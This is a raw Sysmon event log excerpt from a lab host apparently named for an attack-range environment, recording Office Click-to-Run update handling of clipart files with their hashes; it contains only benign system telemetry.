14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01301_.GIFMD5=FC0B728319A67A19A11D05C4ECB0348D,SHA256=34FE1CBD5F27B3A42BA4F9502B7951987144495CADFE8C01C6776080400B9862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01300_.GIFMD5=B1279FD8FCBEF60225F3758F1A225AB1,SHA256=43389207A81814311723AA592D4E326DE2570B51882049BCD56A887A4DE35979,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01299_.GIFMD5=2864FE4820D7F922A4BBC14398038DA2,SHA256=B2D0076E1BF312E29F249947F6CEAAB1F3AAC17C0BFE8B5975494C693D28C5F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01298_.GIFMD5=E27116377840F48737FDAB2B5DAC568E,SHA256=3C46DAE9B4FC70E9A9E0F9993A7D01E34D63A218CF2FEDD219CB1415E991D4B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01297_.GIFMD5=86DC0E2F942CFB062A8BCB3C0F3E208D,SHA256=9547ED12A230CDDE6A9B45FAD271A79FFE13C4B7919AC719905896605C043BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01296_.GIFMD5=34D9273CCF41B182F84BFD4EB4B9342E,SHA256=796B46455B4FB519C7E180C75483827BFC261463200EEB70BC3F16C2FDADB122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01295_.GIFMD5=829C4C12CF86F4BC901DA5595AAA371E,SHA256=0CCC0879678EC1F2418680062AAC0520B441225989FDDF7AA2C297630799E2E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01294_.GIFMD5=0775D7E483F0C6BBB438D2E4BF32E94E,SHA256=F66847DC872D071B18FA1B429CC999FD853E91C8FFE3DC87DBE538A477268626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01293_.GIFMD5=0D9892DFE819E839BC8052FD2B670C43,SHA256=416F3A85519648F86282C1D59D65E3F2E8878EEE8EF570FC65E8FCD39AF04E11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01292_.GIFMD5=6F86E0FEFCBEC71F9AE913D1794514CE,SHA256=C2AF38A905683258C989C2859F40369CF024136A3B3935D54FD637952A992215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01268_.GIFMD5=6E956E35074FD36FB1FFC1CD25478870,SHA256=315C7299921BD593746A14BF3C4A960BB7EEA2AF0C680875ACEA3E908FA92CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01253_.GIFMD5=9DED530921B27F9FD843819F16D3655F,SHA256=92DFD58173786C23662C72CD542FF0D5F160B371C11B6D72A91CF226092ACC64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01246_.GIFMD5=CF1B79ECFDBD37D95C1793928C1C6740,SHA256=F034C4BD23A8D3DB155253FAED9475C3F47EC9CD00C0BB923E64D01A892013C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01245_.GIFMD5=0ECC9697636710DA8AF2766627814A70,SHA256=2B48E75ECA9473A40BBA4A949DD85EA30864923AA87F5416BE12D47EE9F58CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01244_.GIFMD5=AD12B8307B27314095D5C97F7775E64A,SHA256=631113E0531F2CD9ADC55F3AB827DA4188C8BBF516A14760CCE45DAFCBDA24FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01243_.GIFMD5=2F66BCB77122B7929E74107A331340BB,SHA256=551F554C863E07EAD92EDAB92AE84F3873E1DBD606001D3028A12697001FE90F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01242_.GIFMD5=905EB885AABCCB88660D2899B12E3140,SHA256=3EC22BF5444385C968B4E9F083B46A35BBE1DF5858C524CF89CA8324373ED71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01241_.GIFMD5=9653EB671FE97CAE91DF6D08E6E75316,SHA256=CE4FFABCB072AB66C835718A901187D0FDA1143BA32053EE7ECC50B2FC313C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01240_.GIFMD5=9159C2FDB51E1389DF0CF3A50EB6BBEA,SHA256=0017AFEACA7FAC8B3488D7C9A70098498DB4D78B2C5BAA8AC6AA9037B4D4526C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01239_.GIFMD5=0D529D7E71BBB12B99ACF060AFB28254,SHA256=37192E90B0E72AD019C46BC0D906572EAC39D1C70DC95E8BD29F86EF7801C9E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01238_.GIFMD5=407CC3631B4F745C0625510435769B1C,SHA256=522B151C2ED3CF3FCAB92AFFC6BD91ECCA0A1D549F67B8A39E0BE07A0004E36E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01237_.GIFMD5=CDA64BB28083C5EF85BE18A36611ECC9,SHA256=77DFEC06A9A6EAED4A8E449B3DE639D806FDF2B7B377B7A72A81A9294E5FED2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01219_.GIFMD5=9E0DBB3DB83E3D276E3A1A68DC3B6138,SHA256=A57B84823E34F452B67813E325C9CC2BFBB4B6AABE77F9BBD1EE4BE588BDC016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\VCTRN_01.MIDMD5=18BF39A1BBF0BD8C1DF92A6720A72945,SHA256=E4462ED418AAA8E3477C9087386E98DE0F7E8168ABEB896498BA318D2F83FD46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\URBAN_01.MIDMD5=8660C485DD9714E0CCBF9E9AE88B26F3,SHA256=BB4823A479DAC5522DF09B14DBA05D4858DEB746C5E3BE1C5536F00BC8871854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00494_.WMFMD5=E2065DBD7AA842AF935191D8516A5CAD,SHA256=6EBF5BC787A9749E95F4568587BD5174FE77C11095F0543F13366693D49D9597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00482_.WMFMD5=F0DAC2D1F0AAAC32C979F9CF369F766A,SHA256=6C5330429D7B434EAC762E5148898EC44579EC99872246A1B87675A23E6AC033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00402_.WMFMD5=4D17DD1025735D2A2063B2678134799D,SHA256=5F7C7710569752C46C4106A00B8E340C6DCD65ACBFF0392631F415161CC1D9D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00233_.WMFMD5=39BB3CC17280EF16A264208740B277B0,SHA256=4C52DA23DDD29A0BECEA202A14FDED9FFE7D92FEFADB6A74848058A639C28126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00232_.WMFMD5=6FC2C214BCA98A7C9AD1BE3BCD46C266,SHA256=7AF823E9C41A88E9019343773CD4C91E2D1EC0CB9BAEEC23DD8B15A20726A7F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00178_.WMFMD5=FBA71759CF09C64FDD83A37ED1936019,SHA256=A410390BC0D66C1C3760EF656751279AF367F433EB29B946EA8810FD8DA704C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00172_.WMFMD5=4212836CCD239030ECE040E5752C0751,SHA256=E9198AD77ACD83B0734C1B0C2336A2A91804B6FB66691899B94AA353A5D04462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00126_.WMFMD5=5C4B085CB41DF5D9AAED191F209B642E,SHA256=C9D40047D9C0914A66BCDA31AB0085136C1C36C90EF384968CF1F9D5FA65CF9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00116_.WMFMD5=0B3F1A73D0CA91A8B48A472442CE65F0,SHA256=4EDB1E0358100F3998313DF65FA20256C9A637056C1B6A7B73AB2A638632C40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00097_.WMFMD5=D449C94C0F8B87B2A0853A27FE7EDC8E,SHA256=1F6C109A2FE479D07A66E124A8F80461BDC5B5DF9B8D24BA2715929C7F106DC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00095_.WMFMD5=2533DE9EB72287DC15F588A1A8CAE731,SHA256=3A681215447E6F3450B2BA339776C6EA71FA19DDDF5939CAE0CE499174875B59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TR00006_.WMFMD5=E3F558E0CD73744D9D81D66B9CDF7E77,SHA256=DED1B47A43652D9C4766298F40A035B861BBC4EAD9EA0148544889EE48C9D72A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN01308_.WMFMD5=58935956BA0D6B576804FC6DDA959D9A,SHA256=22F47F8D11BC36DE72E64438402EB29D8122B4C5DC8CB5DD61ED0E2E37BC5C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN01165_.WMFMD5=2CAA877C04D44DD3C240427D1BAC3F9A,SHA256=23859879E24DA4250AD076FEED5723807C27E11F74242D6632B295FECEDAD671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN01164_.WMFMD5=8A32F3D80D14FA946EA74FF79A4774FF,SHA256=2F29C07A2E42C3F78AEC873E9A44C50F62099A6590062478455980F6A71E1757,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00687_.WMFMD5=192535E6E7C269359E25761C0C1DDDCF,SHA256=58E1F4C9BAD7DD82C1E02424004CEE86F27F5F02BC8BD2FE56503FDB4446AF52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00411_.WMFMD5=B1295D1F29F6419109B538FE63AB1ABC,SHA256=BC13BE47AEE480E057B6B3E6502CC9D19036224517124B9D8955D4438B5C5255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00330_.WMFMD5=CAD008B402B26143FEF22F4004787873,SHA256=B22619DC16971B42825D39756B39F9EB92A418614E41BA500EC5C17A63B63136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00255_.WMFMD5=4C0C339FDB3FE95CBDCF0F5A6BCE0F97,SHA256=B6F55B71AD261D5D79F7F6039BDF7626A3727C15FEC8DF557022FC7A978F0D4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00253_.WMFMD5=5B460E266B91DFE65491777FBC506AFD,SHA256=673E770A1FE5BDA9007666E67838F43010A0E0A978105BBAF401969F0BE543D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 